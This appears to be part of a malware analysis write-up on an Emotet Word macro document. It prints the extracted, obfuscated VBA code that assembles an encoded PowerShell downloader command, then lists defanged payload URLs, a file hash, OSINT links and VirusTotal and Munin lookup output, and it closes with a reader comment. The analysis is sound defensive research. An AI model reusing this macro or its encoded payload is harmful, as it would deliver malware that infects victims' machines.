Z,QBy,AHA,Acg,BvA,GYA,aQB,sAG,UAK,wAo,ACg,AKA,AnA,GcA,JwA,rAC,cAU,QBX,AFk,AJw,ArA,CcA,dgA,zAC,cAK,QAr,ACc,Adw,AnA,CsA,JwB,tAC,cAK,wAn,ADk,AZw,AnA,CsA,KAA,nAG,cAU,QAn,ACs,AJw,BXA,CcA,KQA,rAC,gAJ,wBX,AHo,AJw,ArA,CcA,bgA,3AC,cAK,QAr,ACc,AOA,BlA,CcA,KwA,oAC,cAO,ABn,AFE,AJw,ArA,CcA,VwA,nAC,kAK,QAu,ACI,Acg,BlA,HAA,YAB,sAG,AAQ,QBj,AGU,AIg,AoA,CgA,WwB,DAG,gAQ,QBy,AF0,AMQ,AwA,DMA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DEA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DcA,KQA,sAF,sAc,wBU,AFI,ASQ,BOA,EcA,XQB,bAE,MAa,ABB,AHI,AXQ,A5A,DIA,KQA,pAC,sAJ,ABR,ADM,AeQ,B3A,GkA,bwB,vAC,sAK,AAn,AC4,AJw,ArA,CgA,JwB,lAH,gAJ,wAr,ACc,AZQ,AnA,CkA,KQA,7AC,QAW,ABz,AHQ,AYg,B1A,HgA,cgA,9
End Function
Function Zk46e7c8d40(G7b_e54iwh7id_)
On Error Resume Next
X8e38jclqayh83g3a6 = CleanString("powe" + "rshe" + g, bq,g, bq,lg, bq,lg, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq,-g, bq,eg, bq,ng, bq, JABg, bq,VAGg, bq,UAdg, bq,gB3g, bq,AHog, bq,AZwg, bq,B6Ag, bq,D0Ag, bq,KAAg, bq,oACg, bq,cAQg, bq,gAng, bq,ACsg, bq,AJwg, bq,BrAg, bq,G4Ag, bq,dAAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,ANAg, bq,A1Ag, bq,CcAg, bq,KwAg, bq,nAHg, bq,AAJg, bq,wApg, bq,ACkg, bq,AOwg, bq,AmAg, bq,CgAg, bq,JwBg, bq,uAGg, bq,UAJg, bq,wArg, bq,ACcg, bq,Adwg, bq,AtAg, bq,GkAg, bq,dAAg, bq,nACg, bq,sAJg, bq,wBlg, bq,AG0g, bq,AJwg, bq,ApAg, bq,CAAg, bq,JABg, bq,FAEg, bq,4AVg, bq,gA6g, bq,AHUg, bq,Acwg, bq,BFAg, bq,HIAg, bq,cABg, bq,yAEg, bq,8ARg, bq,gBpg, bq,AGwg, bq,AZQg, bq,BcAg, bq,HkAg, bq,dgAg, bq,zAFg, bq,cAbg, bq,QA5g, bq,AGcg, bq,AXAg, bq,B3Ag, bq,FoAg, bq,TgAg, bq,3ADg, bq,gAZg, bq,QA4g, bq,AFwg, bq,AIAg, bq,AtAg, bq,GkAg, bq,dABg, bq,lAGg, bq,0Adg, bq,AB5g, bq,AHAg, bq,AZQg, bq,AgAg, bq,GQAg, bq,SQBg, bq,SAGg, bq,UAQg, bq,wBUg, bq,AG8g, bq,AUgg, bq,B5Ag, bq,DsAg, bq,WwBg, bq,OAGg, bq,UAdg, bq,AAug, bq,AFMg, bq,AZQg, bq,ByAg, bq,HYAg, bq,aQBg, bq,jAGg, bq,UAUg, bq,ABvg, bq,AGkg, bq,Abgg, bq,B0Ag, bq,E0Ag, bq,YQBg, bq,uAGg, bq,EAZg, bq,wBlg, bq,AHIg, bq,AXQg, bq,A6Ag, bq,DoAg, bq,IgBg, bq,TAEg, bq,UAQg, bq,wBgg, bq,AFUg, bq,Acgg, bq,BJAg, bq,GAAg, bq,VABg, bq,ZAFg, bq,AAYg, bq,ABSg, bq,AE8g, bq,AdAg, bq,BPAg, bq,EMAg, bq,YABg, bq,vAGg, bq,wAIg, bq,gAgg, bq,AD0g, bq,AIAg, bq,AoAg, bq,CgAg, bq,JwBg, bq,0AGg, bq,wAcg, bq,wAng, bq,ACsg, bq,AJwg, bq,AxAg, bq,DIAg, bq,LAAg, bq,nACg, bq,kAKg, bq,wAng, bq,ACAg, bq,AdAg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,wAJg, bq,wArg, bq,ACcg, bq,Acwg, bq,AxAg, bq,DEAg, bq,LAAg, bq,gAHg, bq,QAJg, bq,wApg, bq,ACsg, bq,AJwg, bq,BsAg, bq,CcAg, bq,KwAg, bq,nAHg, bq,MAJg, bq,wApg, bq,ADsg, bq,AJAg, bq,BRAg, bq,DMAg, bq,eQBg, bq,3AGg, bq,kAbg, bq,wBvg, bq,ACAg, bq,APQg, bq,AgAg, bq,CgAg, bq,KAAg, bq,nAFg, bq,QAJg, bq,wArg, bq,ACcg, bq,AaQg, bq,BpAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wAwg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GIAg, bq,YwAg, bq,nACg, bq,kAKg, bq,wAng, bq,AHAg, bq,AJwg, bq,ApAg, bq,DsAg, bq,JABg, bq,FAGg, bq,YAZg, bq,QA1g, bq,AHEg, bq,Aegg, bq,A5Ag, bq,D0Ag, bq,KAAg, bq,nAFg, bq,cAJg, bq,wArg, bq,ACgg, bq,AJwg, bq,B6Ag, bq,CcAg, bq,KwAg, bq,nADg, bq,UAZg, bq,AA0g, bq,ACcg, bq,AKQg, bq,ArAg, bq,CcAg, bq,NABg, bq,lACg, bq,cAKg, bq,QA7g, bq,ACQg, bq,AQgg, bq,BuAg, bq,HAAg, bq,XwBg, bq,zADg, bq,UAdg, bq,gA9g, bq,ACQg, bq,AZQg, bq,BuAg, bq,HYAg, bq,OgBg, bq,1AHg, bq,MAZg, bq,QByg, bq,AHAg, bq,Acgg, bq,BvAg, bq,GYAg, bq,aQBg, bq,sAGg, bq,UAKg, bq,wAog, bq,ACgg, bq,AKAg, bq,AnAg, bq,GcAg, bq,JwAg, bq,rACg, bq,cAUg, bq,QBXg, bq,AFkg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dgAg, bq,zACg, bq,cAKg, bq,QArg, bq,ACcg, bq,Adwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,tACg, bq,cAKg, bq,wAng, bq,ADkg, bq,AZwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,cAUg, bq,QAng, bq,ACsg, bq,AJwg, bq,BXAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBXg, bq,AHog, bq,AJwg, bq,ArAg, bq,CcAg, bq,bgAg, bq,3ACg, bq,cAKg, bq,QArg, bq,ACcg, bq,AOAg, bq,BlAg, bq,CcAg, bq,KwAg, bq,oACg, bq,cAOg, bq,ABng, bq,AFEg, bq,AJwg, bq,ArAg, bq,CcAg, bq,VwAg, bq,nACg, bq,kAKg, bq,QAug, bq,ACIg, bq,Acgg, bq,BlAg, bq,HAAg, bq,YABg, bq,sAGg, bq,AAQg, bq,QBjg, bq,AGUg, bq,AIgg, bq,AoAg, bq,CgAg, bq,WwBg, bq,DAGg, bq,gAQg, bq,QByg, bq,AF0g, bq,AMQg, bq,AwAg, bq,DMAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DEAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DcAg, bq,KQAg, bq,sAFg, bq,sAcg, bq,wBUg, bq,AFIg, bq,ASQg, bq,BOAg, bq,EcAg, bq,XQBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A5Ag, bq,DIAg, bq,KQAg, bq,pACg, bq,sAJg, bq,ABRg, bq,ADMg, bq,AeQg, bq,B3Ag, bq,GkAg, bq,bwBg, bq,vACg, bq,sAKg, bq,AAng, bq,AC4g, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,lAHg, bq,gAJg, bq,wArg, bq,ACcg, bq,AZQg, bq,AnAg, bq,CkAg, bq,KQAg, bq,7ACg, bq,QAWg, bq,ABzg, bq,AHQg, bq,AYgg, bq,B1Ag, bq,HgAg, bq,cgAg, bq,9)
Hy1d43_mrbnkby5l = Split(X8e38jclqayh83g3a6, "g, bq,")
B4ru9eb_hhowd = "powe" + "rshe" + ,,l,l, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,-,e,n, JAB,VAG,UAd,gB3,AHo,AZw,B6A,D0A,KAA,oAC,cAQ,gAn,ACs,AJw,BrA,G4A,dAA,nAC,kAK,wAo,ACc,ANA,A1A,CcA,KwA,nAH,AAJ,wAp,ACk,AOw,AmA,CgA,JwB,uAG,UAJ,wAr,ACc,Adw,AtA,GkA,dAA,nAC,sAJ,wBl,AG0,AJw,ApA,CAA,JAB,FAE,4AV,gA6,AHU,Acw,BFA,HIA,cAB,yAE,8AR,gBp,AGw,AZQ,BcA,HkA,dgA,zAF,cAb,QA5,AGc,AXA,B3A,FoA,TgA,3AD,gAZ,QA4,AFw,AIA,AtA,GkA,dAB,lAG,0Ad,AB5,AHA,AZQ,AgA,GQA,SQB,SAG,UAQ,wBU,AG8,AUg,B5A,DsA,WwB,OAG,UAd,AAu,AFM,AZQ,ByA,HYA,aQB,jAG,UAU,ABv,AGk,Abg,B0A,E0A,YQB,uAG,EAZ,wBl,AHI,AXQ,A6A,DoA,IgB,TAE,UAQ,wBg,AFU,Acg,BJA,GAA,VAB,ZAF,AAY,ABS,AE8,AdA,BPA,EMA,YAB,vAG,wAI,gAg,AD0,AIA,AoA,CgA,JwB,0AG,wAc,wAn,ACs,AJw,AxA,DIA,LAA,nAC,kAK,wAn,ACA,AdA,AnA,CsA,KAA,nAG,wAJ,wAr,ACc,Acw,AxA,DEA,LAA,gAH,QAJ,wAp,ACs,AJw,BsA,CcA,KwA,nAH,MAJ,wAp,ADs,AJA,BRA,DMA,eQB,3AG,kAb,wBv,ACA,APQ,AgA,CgA,KAA,nAF,QAJ,wAr,ACc,AaQ,BpA,CcA,KQA,rAC,gAJ,wAw,ACc,AKw,AnA,GIA,YwA,nAC,kAK,wAn,AHA,AJw,ApA,DsA,JAB,FAG,YAZ,QA1,AHE,Aeg,A5A,D0A,KAA,nAF,cAJ,wAr,ACg,AJw,B6A,CcA,KwA,nAD,UAZ,AA0,ACc,AKQ,ArA,CcA,NAB,lAC,cAK,QA7,ACQ,AQg,BuA,HAA,XwB,zAD,UAd,gA9,ACQ,AZQ,BuA,HYA,OgB,1AH,MAZ,QBy,AHA,Acg,BvA,GYA,aQB,sAG,UAK,wAo,ACg,AKA,AnA,GcA,JwA,rAC,cAU,QBX,AFk,AJw,ArA,CcA,dgA,zAC,cAK,QAr,ACc,Adw,AnA,CsA,JwB,tAC,cAK,wAn,ADk,AZw,AnA,CsA,KAA,nAG,cAU,QAn,ACs,AJw,BXA,CcA,KQA,rAC,gAJ,wBX,AHo,AJw,ArA,CcA,bgA,3AC,cAK,QAr,ACc,AOA,BlA,CcA,KwA,oAC,cAO,ABn,AFE,AJw,ArA,CcA,VwA,nAC,kAK,QAu,ACI,Acg,BlA,HAA,YAB,sAG,AAQ,QBj,AGU,AIg,AoA,CgA,WwB,DAG,gAQ,QBy,AF0,AMQ,AwA,DMA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DEA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DcA,KQA,sAF,sAc,wBU,AFI,ASQ,BOA,EcA,XQB,bAE,MAa,ABB,AHI,AXQ,A5A,DIA,KQA,pAC,sAJ,ABR,ADM,AeQ,B3A,GkA,bwB,vAC,sAK,AAn,AC4,AJw,ArA,CgA,JwB,lAH,gAJ,wAr,ACc,AZQ,AnA,CkA,KQA,7AC,QAW,ABz,AHQ,AYg,B1A,HgA,cgA,9
Zk46e7c8d40 = B4ru9eb_hhowd
End Function
Artifacts
==========
IOCs
—–
hxxp://haymetetrading[.]com/wp-includes/yGELKj4/
hxxp://simofferbd24[.]com/wp-includes/fsiQc/
hxxp://401kplansinfo[.]com/cgi-bin/KtFRk/
hxxp://fidelityguide[.]com/cgi-bin/VA/
hxxps://sirnakmidyeci[.]com/wp-includes/qk9wW2/
hxxps://subitocarne[.]com/wp-content/ByeOAt9/
hxxps://eliesalibaarchitect[.]com/wordpress/T/
OSINT
——–
http://twitter.com/Cryptolaemus1/status/1308071468815847426
http://pastebin.com/UYbUAeuS – Emotet Epoch 2 IOCs as of 2020-09-21 15:05 US/Eastern
http://urlhaus.abuse.ch/browse.php?search=http%3A%2F%2Fhaymetetrading.com%2Fwp-includes%2FyGELKj4%2F+
http://urlhaus.abuse.ch/browse.php?search=http%3A%2F%2Fsimofferbd24.com%2Fwp-includes%2FfsiQc%2F
http://urlhaus.abuse.ch/browse.php?search=http%3A%2F%2F401kplansinfo.com%2Fcgi-bin%2FKtFRk%2F+
http://urlhaus.abuse.ch/browse.php?search=http%3A%2F%2Ffidelityguide.com%2Fcgi-bin%2FVA%2F
http://urlhaus.abuse.ch/browse.php?search=https%3A%2F%2Fsirnakmidyeci.com%2Fwp-includes%2Fqk9wW2%2F+
http://urlhaus.abuse.ch/browse.php?search=https%3A%2F%2Fsubitocarne.com%2Fwp-content%2FByeOAt9%2F
http://urlhaus.abuse.ch/browse.php?search=https%3A%2F%2Feliesalibaarchitect.com%2Fwordpress%2FT%2F
File hashes
————–
515ade7cffd3da164621375f63150e57f2f8c9f06bad8289c8adde9d3803daa0 — LRE-090120 JYW-092120.doc
Machinea
———-
machinae 515ade7cffd3da164621375f63150e57f2f8c9f06bad8289c8adde9d3803daa0 http://haymetetrading.com/wp-includes/yGELKj4/ http://simofferbd24.com/wp-includes/fsiQc/ http://401kplansinfo.com/cgi-bin/KtFRk/ http://fidelityguide.com/cgi-bin/VA/ http://sirnakmidyeci.com/wp-includes/qk9wW2/ http://subitocarne.com/wp-content/ByeOAt9/ http://eliesalibaarchitect.com/wordpress/T/
********************************************************************************
* Information for 515ade7cffd3da164621375f63150e57f2f8c9f06bad8289c8adde9d3803daa0
* Observable type: hash.sha256 (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with –list-sites
[+] VirusTotal File Report Results
[-] Date submitted: 2020-09-22 16:56:49
[-] Detected engines: 35
[-] Total engines: 59
[-] Scans: (‘Elastic’, ‘malicious (high confidence)’)
[-] Scans: (‘ClamAV’, ‘Doc[.]Downloader[.]Generic-9764611-0’)
[-] Scans: (‘CAT-QuickHeal’, ‘OLE[.]Emotet.39167’)
[-] Scans: (‘McAfee’, ‘W97M/Downloader[.]dbv’)
[-] Scans: (‘K7AntiVirus’, ‘Trojan ( 0056edf51 )’)
[-] Scans: (‘K7GW’, ‘Trojan ( 0056edf51 )’)
[-] Scans: (‘TrendMicro’, ‘Trojan.W97M[.]EMOTET[.]TIOIBELH’)
[-] Scans: (‘Cyren’, ‘W97M/Agent.A’)
[-] Scans: (‘Symantec’, ‘W97M[.]Downloader’)
[-] Scans: (‘ESET-NOD32’, ‘VBA/TrojanDownloader[.]Agent[.]UFY’)
[-] Scans: (‘TrendMicro-HouseCall’, ‘Trojan.W97M[.]EMOTET[.]TIOIBELH’)
[-] Scans: (‘Kaspersky’, ‘HEUR:Trojan.MSOffice[.]SAgent[.]gen’)
[-] Scans: (‘BitDefender’, ‘VB:Trojan.VBA[.]Agent[.]BHR’)
[-] Scans: (‘MicroWorld-eScan’, ‘VB:Trojan.VBA[.]Agent[.]BHR’)
[-] Scans: (‘Tencent’, ‘Heur[.]Macro[.]Generic.h.9fc6359d’)
[-] Scans: (‘Ad-Aware’, ‘VB:Trojan.VBA[.]Agent[.]BHR’)
[-] Scans: (‘Sophos’, ‘Mal/DocDl-K’)
[-] Scans: (‘F-Secure’, ‘Malware[.]VBA/Dldr.Agent[.]boxrg’)
[-] Scans: (‘Invincea’, ‘Mal/DocDl-K’)
[-] Scans: (‘McAfee-GW-Edition’, ‘W97M/Downloader[.]dbv’)
[-] Scans: (‘FireEye’, ‘VB:Trojan.VBA[.]Agent[.]BHR’)
[-] Scans: (‘Emsisoft’, ‘VB:Trojan.VBA[.]Agent[.]BHR (B)’)
[-] Scans: (‘Avira’, ‘VBA/Dldr[.]Agent[.]boxrg’)
[-] Scans: (‘Microsoft’, ‘TrojanDownloader:O97M/Emotet[.]PEE!MTB’)
[-] Scans: (‘Arcabit’, ‘VB:Trojan.VBA[.]Agent[.]BHR’)
[-] Scans: (‘AegisLab’, ‘Trojan[.]MSWord[.]Generic.4!c’)
[-] Scans: (‘ZoneAlarm’, ‘HEUR:Trojan.MSOffice[.]SAgent[.]gen’)
[-] Scans: (‘GData’, ‘VB:Trojan.VBA[.]Agent[.]BHR’)
[-] Scans: (‘AhnLab-V3’, ‘Downloader/MSOffice[.]Generic’)
[-] Scans: (‘TACHYON’, ‘Suspicious/W97M[.]Obfus[.]Gen.5’)
[-] Scans: (‘Zoner’, ‘Probably Heur.W97Obfuscated’)
[-] Scans: (‘Rising’, ‘Malware[.]ObfusVBA@ML.89 (VBA)’)
[-] Scans: (‘Ikarus’, ‘Trojan-Downloader[.]VBA[.]Emotet’)
[-] Scans: (‘Fortinet’, ‘VBA/Agent[.]DBV!tr[.]dldr’)
[-] Scans: (‘Qihoo-360’, ‘virus[.]office[.]qexvmc.1095’)
********************************************************************************
* Information for http://haymetetrading.com/wp-includes/yGELKj4/
* Observable type: url (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with –list-sites
[-] No URL Unshorten Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
[+] VirusTotal URL Report Results
[-] Date submitted: 2020-09-22 16:00:16
[-] Detected scanners: 13
[-] Total scanners: 79
[-] URL Scanner: (‘Kaspersky’, ‘malware site’)
[-] URL Scanner: (‘G-Data’, ‘malware site’)
[-] URL Scanner: (‘CyRadar’, ‘malicious site’)
[-] URL Scanner: (‘Dr[.]Web’, ‘malicious site’)
[-] URL Scanner: (‘Spamhaus’, ‘malware site’)
[-] URL Scanner: (‘Avira’, ‘malware site’)
[-] URL Scanner: (‘SCUMWARE[.]org’, ‘malware site’)
[-] URL Scanner: (‘URLhaus’, ‘malicious site’)
[-] URL Scanner: (‘ESET’, ‘malware site’)
[-] URL Scanner: (‘Sophos’, ‘malware site’)
[-] URL Scanner: (‘Netcraft’, ‘malicious site’)
[-] URL Scanner: (‘CRDF’, ‘malicious site’)
[-] URL Scanner: (‘Fortinet’, ‘malware site’)
********************************************************************************
* Information for http://simofferbd24.com/wp-includes/fsiQc/
* Observable type: url (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with –list-sites
[-] No URL Unshorten Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
[+] VirusTotal URL Report Results
[-] Date submitted: 2020-09-22 02:19:27
[-] Detected scanners: 12
[-] Total scanners: 79
[-] URL Scanner: (‘Kaspersky’, ‘malware site’)
[-] URL Scanner: (‘CyRadar’, ‘malicious site’)
[-] URL Scanner: (‘AlienVault’, ‘malicious site’)
[-] URL Scanner: (‘Spamhaus’, ‘malware site’)
[-] URL Scanner: (‘Avira’, ‘malware site’)
[-] URL Scanner: (‘SCUMWARE[.]org’, ‘malware site’)
[-] URL Scanner: (‘URLhaus’, ‘malicious site’)
[-] URL Scanner: (‘ESET’, ‘malware site’)
[-] URL Scanner: (‘Sophos’, ‘malware site’)
[-] URL Scanner: (‘Netcraft’, ‘malicious site’)
[-] URL Scanner: (‘CRDF’, ‘malicious site’)
[-] URL Scanner: (‘Fortinet’, ‘malware site’)
********************************************************************************
* Information for http://401kplansinfo.com/cgi-bin/KtFRk/
* Observable type: url (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with –list-sites
[-] No URL Unshorten Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
[+] VirusTotal URL Report Results
[-] Date submitted: 2020-09-21 16:42:18
[-] Detected scanners: 3
[-] Total scanners: 79
[-] URL Scanner: (‘G-Data’, ‘malware site’)
[-] URL Scanner: (‘Spamhaus’, ‘malware site’)
[-] URL Scanner: (‘Fortinet’, ‘malware site’)
********************************************************************************
* Information for http://fidelityguide.com/cgi-bin/VA/
* Observable type: url (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with –list-sites
[-] No URL Unshorten Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
********************************************************************************
* Information for http://sirnakmidyeci.com/wp-includes/qk9wW2/
* Observable type: url (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with –list-sites
[-] No URL Unshorten Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
********************************************************************************
* Information for http://subitocarne.com/wp-content/ByeOAt9/
* Observable type: url (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with –list-sites
[-] No URL Unshorten Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
[+] VirusTotal URL Report Results
[-] Date submitted: 2020-09-21 18:24:28
[-] Detected scanners: 8
[-] Total scanners: 79
[-] URL Scanner: (‘Kaspersky’, ‘malware site’)
[-] URL Scanner: (‘Spamhaus’, ‘malware site’)
[-] URL Scanner: (‘Avira’, ‘malware site’)
[-] URL Scanner: (‘SCUMWARE[.]org’, ‘malware site’)
[-] URL Scanner: (‘URLhaus’, ‘malicious site’)
[-] URL Scanner: (‘ESET’, ‘malware site’)
[-] URL Scanner: (‘Netcraft’, ‘malicious site’)
[-] URL Scanner: (‘Fortinet’, ‘malware site’)
********************************************************************************
* Information for http://eliesalibaarchitect.com/wordpress/T/
* Observable type: url (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with –list-sites
[-] No URL Unshorten Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
[+] VirusTotal URL Report Results
[-] Date submitted: 2020-09-22 05:04:16
[-] Detected scanners: 12
[-] Total scanners: 79
[-] URL Scanner: (‘Kaspersky’, ‘malware site’)
[-] URL Scanner: (‘CyRadar’, ‘malicious site’)
[-] URL Scanner: (‘AlienVault’, ‘malicious site’)
[-] URL Scanner: (‘Spamhaus’, ‘malware site’)
[-] URL Scanner: (‘Avira’, ‘malware site’)
[-] URL Scanner: (‘SCUMWARE[.]org’, ‘malware site’)
[-] URL Scanner: (‘URLhaus’, ‘malicious site’)
[-] URL Scanner: (‘ESET’, ‘malware site’)
[-] URL Scanner: (‘Sophos’, ‘malware site’)
[-] URL Scanner: (‘Netcraft’, ‘malicious site’)
[-] URL Scanner: (‘CRDF’, ‘malicious site’)
[-] URL Scanner: (‘Fortinet’, ‘malware site’)
Munin
——-
Online Hash Checker for Virustotal and Other Services
Florian Roth – 0.18.1 July 2019
1 / 1 > Malicious
HASH: 515ade7cffd3da164621375f63150e57f2f8c9f06bad8289c8adde9d3803daa0 COMMENT: LRE-090120 JYW-092120.doc
VIRUS: Microsoft: TrojanDownloader:O97M/Emotet.PEE!MTB / Kaspersky: HEUR:Trojan.MSOffice.SAgent.gen / McAfee: W97M/Downloader.dbv / TrendMicro: Trojan.W97M.EMOTET.TIOIBELH / ESET-NOD32: VBA/TrojanDownloader.Agent.UFY / Symantec: W97M.Downloader / F-Secure: Malware.VBA/Dldr.Agent.boxrg / Sophos: Mal/DocDl-K / GData: VB:Trojan.VBA.Agent.BHR
TYPE: MS Word Document SIZE: 199.12 KB FILENAMES: Price – Sep 21, 2020.doc, Price – Sep 21, 2020.doc
FIRST: 2020-09-21 20:04:15 LAST: 2020-09-22 16:56:49 SUBMISSIONS: 1 REPUTATION: 0
COMMENTS: 3 USERS: thor, inquest.labs, thor TAGS: OBFUSCATED EXE-PATTERN DOC MACROS ATTACHMENT EXECUTES-DROPPED-FILE HIDE-APP CREATE-OLE
Good job!
I tried to see the “AlternativeText” with LibreOffice on Linux, but this was not possibe. Is there a trick to see the string with Didier’s Python Codes?